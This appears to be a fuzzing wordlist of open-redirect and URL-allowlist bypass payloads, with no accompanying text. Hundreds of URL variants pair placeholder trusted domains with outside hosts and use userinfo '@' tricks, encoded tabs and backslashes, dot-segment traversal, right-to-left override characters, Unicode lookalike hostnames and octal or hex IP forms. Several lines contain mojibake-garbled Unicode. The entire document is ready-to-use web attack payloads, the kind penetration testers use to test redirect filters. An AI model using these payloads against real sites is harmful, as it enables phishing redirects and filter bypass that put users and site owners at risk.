http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
https://%09/bing.com
/https://%09/example.com
https://%09/example.com@google.com
/https://%09/google.com
https://%09/google.com
https://%09/localdomain.pw
https://%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/traidnt.net@bing.com
https://%09/whitelisted.com@google.com
https://%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/WillBeReplaced.com@google.com
https://%09/www.whitelisteddomain.tld@google.com
https://%09/www.whitelisteddomain.tld@localdomain.pw
https://%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dgoogle.com
https://%0a%0dlocaldomain.pw
https://%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https%3a%2f%2fgoogle.com%2f
https%3A%2F%2Fwww.google.com
https%3A/;@localdomain.pw
https%3A/ï¹”@localdomain.pw
https%3A/localdomain.pw
https%3A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.whitelisteddomain.tld/
https%3A/:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.whitelisteddomain.tld
https%3A/www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.whitelisteddomain.tld
/https:/%5cbing.com/
/https:/%5cbing.com/?
/https://%5cbing.com
https://%5cbing.com
/https:/%5cblackfan.ru/
/https:/%5cexample.com/
/https://%5cexample.com
/https://%5cexample.com@google.com
https://%5cexample.com@google.com
/https:/%5cgoogle.com/
/https:/%5cgoogle.com/?
/https://%5cgoogle.com
https:/%5cgoogle.com/
https://%5cgoogle.com
/https:/%5clocaldomain.pw/
/https://%5clocaldomain.pw
https:/%5clocaldomain.pw/
https://%5clocaldomain.pw
/https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5ctraidnt.net@bing.com
https://%5ctraidnt.net@bing.com
/https://%5cwhitelisted.com@google.com
https://%5cwhitelisted.com@google.com
/https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5cWillBeReplaced.com@google.com
https://%5cWillBeReplaced.com@google.com
/https://%5cwww.whitelisteddomain.tld@google.com
https://%5cwww.whitelisteddomain.tld@google.com
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
/https://%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://bing.com//
/https://bing.com/
Â°/https://bing.com
https://bing.com
https://bing.com/
https://bing.com//
https:bing.com
//https:///bing.com/%2e%2e
/https://bing.com/%2e%2e
https:///bing.com/%2e%2e
//https://bing.com/%2e%2e%2f
https://bing.com/%2e%2e%2f
/https://bing.com/%2f..
https://bing.com/%2f..
/https:///bing.com/%2f%2e%2e
/https://bing.com/%2f%2e%2e
https:///bing.com/%2f%2e%2e
https://bing.com/%2f%2e%2e
https://bing.comÄŸ.traidnt.net
https://:@bing.com\@traidnt.net
//https://example.com//
/https://example.com
/https://example.com/
/https://example.com//
/https:example.com
//https:///example.com/%2e%2e
/https:///example.com/%2e%2e
/https://example.com/%2e%2e
//https://example.com/%2e%2e%2f
/https://example.com/%2e%2e%2f
/https://example.com/%2f..
/https:///example.com/%2f%2e%2e
/https://example.com/%2f%2e%2e
//https://example.com@google.com//
/https://example.com@google.com/
https://example.com@google.com
https://example.com@google.com/
https://example.com@google.com//
/https://example.com@google.com/%2e%2e
https:///example.com@google.com/%2e%2e
//https://example.com@google.com/%2e%2e%2f
https://example.com@google.com/%2e%2e%2f
/https://example.com@google.com/%2f..
https://example.com@google.com/%2f..
/https:///example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
https:///example.com@google.com/%2f%2e%2e
https://example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f.//example.com@google.com/%2f..
https://example.com/https://google.com/
//https://google.com//
/https://google.com
/https://google.com/
/https://google.com//
/https:google.com
https://////google.com
https://google.com
https://google.com/
https://google.com//
https:/\google.com
https:google.com
HtTPs://google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@example.com
https://:@google.com\@whitelisted.com
https://google.com#whitelisted.com
https://google.com/whitelisted.com
https://google.com?whitelisted.com
https://google.com\whitelisted.com
https://:@google.com\@WillBeReplaced.com
https://:@google.com\@www.whitelisteddomain.tld
https://google%E3%80%82com
//https://localdomain.pw//
/https://localdomain.pw/
https://localdomain.pw
https://localdomain.pw/
https://localdomain.pw//
https:localdomain.pw
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
//https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
/https://localdomain.pw/%2f..
https://localdomain.pw/%2f..
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:///localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
/https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://localdomainï½¡pw\áµ—www.whitelisteddomain.tld
https://localdomain.pw\udfff@www.whitelisteddomain.tld/
https://:@localdomain.pw\@www.whitelisteddomain.tld
https://localdomain.pw/www.whitelisteddomain.tld
https://:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.whitelisteddomain.tld
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.whitelisteddomain.tld
https://localdomain.pwï¿½@www.whitelisteddomain.tld/
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://:@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
//https://traidnt.net@bing.com//
/https://traidnt.net@bing.com/
https://traidnt.net@bing.com
https://traidnt.net@bing.com/
https://traidnt.net@bing.com//
/https://traidnt.net@bing.com/%2e%2e
https:///traidnt.net@bing.com/%2e%2e
//https://traidnt.net@bing.com/%2e%2e%2f
https://traidnt.net@bing.com/%2e%2e%2f
/https://traidnt.net@bing.com/%2f..
https://traidnt.net@bing.com/%2f..
/https:///traidnt.net@bing.com/%2f%2e%2e
/https://traidnt.net@bing.com/%2f%2e%2e
https:///traidnt.net@bing.com/%2f%2e%2e
https://traidnt.net@bing.com/%2f%2e%2e
https://traidnt.net/https://bing.com/
https://whitelisted.com@%E2%80%AE@moc.elgoog 
//https://whitelisted.com@google.com//
/https://whitelisted.com@google.com/
https://whitelisted.com.google.com
https://whitelisted.com;@google.com
https://whitelisted.com@google.com
https://whitelisted.com@google.com/
https://whitelisted.com@google.com//
/https://whitelisted.com@google.com/%2e%2e
https:///whitelisted.com@google.com/%2e%2e
//https://whitelisted.com@google.com/%2e%2e%2f
https://whitelisted.com@google.com/%2e%2e%2f
/https://whitelisted.com@google.com/%2f..
https://whitelisted.com@google.com/%2f..
/https:///whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f%2e%2e
https:///whitelisted.com@google.com/%2f%2e%2e
https://whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
https://whitelisted.com/https://google.com/
https://whitelisted.com/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//https://WillBeReplaced.com@google.com//
/https://WillBeReplaced.com@google.com/
https://WillBeReplaced.com@google.com
https://WillBeReplaced.com@google.com/
https://WillBeReplaced.com@google.com//
/https://WillBeReplaced.com@google.com/%2e%2e
https:///WillBeReplaced.com@google.com/%2e%2e
//https://WillBeReplaced.com@google.com/%2e%2e%2f
https://WillBeReplaced.com@google.com/%2e%2e%2f
/https://WillBeReplaced.com@google.com/%2f..
https://WillBeReplaced.com@google.com/%2f..
/https:///WillBeReplaced.com@google.com/%2f%2e%2e
/https://WillBeReplaced.com@google.com/%2f%2e%2e
https:///WillBeReplaced.com@google.com/%2f%2e%2e
https://WillBeReplaced.com@google.com/%2f%2e%2e
https://WillBeReplaced.com/https://google.com/
https://www.bing.com
@https://www.google.com
https:www.google.com
//https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2e%2e
//https://www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
/https:///www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld%09.localdomain.pw
https://www.whitelisteddomain.tld%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld%252elocaldomain.pw
https://www.whitelisteddomain.tld%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld%40%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld%40%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld%40%E2%80%AE@wp.niamodlacol
https://www.whitelisteddomain.tld@%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld@/%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld@%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld@/%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld@%E2%80%AE@wp.niamodlacol
https://www.whitelisteddomain.tld@/%E2%80%AE@wp.niamodlacol
//https://www.whitelisteddomain.tld@google.com//
/https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com
https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com//
/https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld/https://localdomain.pw/
https://www.whitelisteddomain.tld/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.whitelisteddomain.tld/https://www.google.com/
//https://www.whitelisteddomain.tld@localdomain.pw//
/https://www.whitelisteddomain.tld@localdomain.pw/
https://www.whitelisteddomain.tld;@localdomain.pw
https://www.whitelisteddomain.tld@'#localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw//
https://www.whitelisteddomain.tldï¹”@localdomain.pw
//https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.whitelisteddomain.tld;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld@'#â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://www.whitelisteddomain.tldï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
/https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https:///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://www.whitelisteddomain.tldï½¡â‚¨/
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
http:traidnt.net@0x62696e672e636f6d
http://traidnt.net@[::204.79.197.200]
http:traidnt.net@[::204.79.197.200]
http://traidnt.net:80%40bing.com/
http://traidnt.net:80%40bing.com/?
http://traidnt.net+&@bing.com#+@traidnt.net/
http://whitelisted.com@00330.00072.0000326.00000316
http:whitelisted.com@00330.00072.0000326.00000316
http://whitelisted.com@00330.0x3a.54990
http:whitelisted.com@00330.0x3a.54990
http://whitelisted.com@00330.3856078
http:whitelisted.com@00330.3856078
http://whitelisted.com@0330.072.0326.0316
http:whitelisted.com@0330.072.0326.0316
http://whitelisted.com@0xd8.072.54990
http:whitelisted.com@0xd8.072.54990
http://whitelisted.com@0xd8.0x3a.0xd6.0xce
http:whitelisted.com@0xd8.0x3a.0xd6.0xce
http://whitelisted.com@0xd8.3856078
http:whitelisted.com@0xd8.3856078
http://whitelisted.com@0xd83ad6ce
http:whitelisted.com@0xd83ad6ce
http://whitelisted.com@[::216.58.214.206]
http:whitelisted.com@[::216.58.214.206]
http://whitelisted.com%2egoogle.com/
http://whitelisted.com%2eâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://whitelisted.com@3627734734
http:whitelisted.com@3627734734
http://whitelisted.com@472.314.470.462
http:whitelisted.com@472.314.470.462
http://whitelisted.com:80%40google.com/
http://whitelisted.com:80%40â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://whitelisted.com@[::ffff:216.58.214.206]
http:whitelisted.com@[::ffff:216.58.214.206]
http://whitelisted.com@google.com/
http://whitelisted.com+&@google.com#+@whitelisted.com/
http://whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
http://WillBeReplaced.com@00330.00072.0000326.00000316
http:WillBeReplaced.com@00330.00072.0000326.00000316
http://WillBeReplaced.com@00330.0x3a.54990
http:WillBeReplaced.com@00330.0x3a.54990
http://WillBeReplaced.com@00330.3856078
http:WillBeReplaced.com@00330.3856078
http://WillBeReplaced.com@0330.072.0326.0316
http:WillBeReplaced.com@0330.072.0326.0316
http://WillBeReplaced.com@0xd8.072.54990
http:WillBeReplaced.com@0xd8.072.54990
http://WillBeReplaced.com@0xd8.0x3a.0xd6.0xce
http:WillBeReplaced.com@0xd8.0x3a.0xd6.0xce
http://WillBeReplaced.com@0xd8.3856078
http:WillBeReplaced.com@0xd8.3856078
http://WillBeReplaced.com@0xd83ad6ce
http:WillBeReplaced.com@0xd83ad6ce
http://WillBeReplaced.com@[::216.58.214.206]
http:WillBeReplaced.com@[::216.58.214.206]
http://WillBeReplaced.com%2egoogle.com/
http://WillBeReplaced.com@3627734734
http:WillBeReplaced.com@3627734734
http://WillBeReplaced.com@472.314.470.462
http:WillBeReplaced.com@472.314.470.462
http://WillBeReplaced.com:80%40google.com/
http://WillBeReplaced.com@[::ffff:216.58.214.206]
http:WillBeReplaced.com@[::ffff:216.58.214.206]
http://WillBeReplaced.com+&@google.com#+@WillBeReplaced.com/
http://www.google.com
http://www.google.com\.whitelisted.com
http://www.localdomain.pw\.www.whitelisteddomain.tld
http://www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.whitelisteddomain.tld
http://www.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.whitelisted.com
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http://www.whitelisteddomain.tld@0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http://www.whitelisteddomain.tld@0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http://www.whitelisteddomain.tld@0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http://www.whitelisteddomain.tld@[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http://www.whitelisteddomain.tld%2elocaldomain.pw/
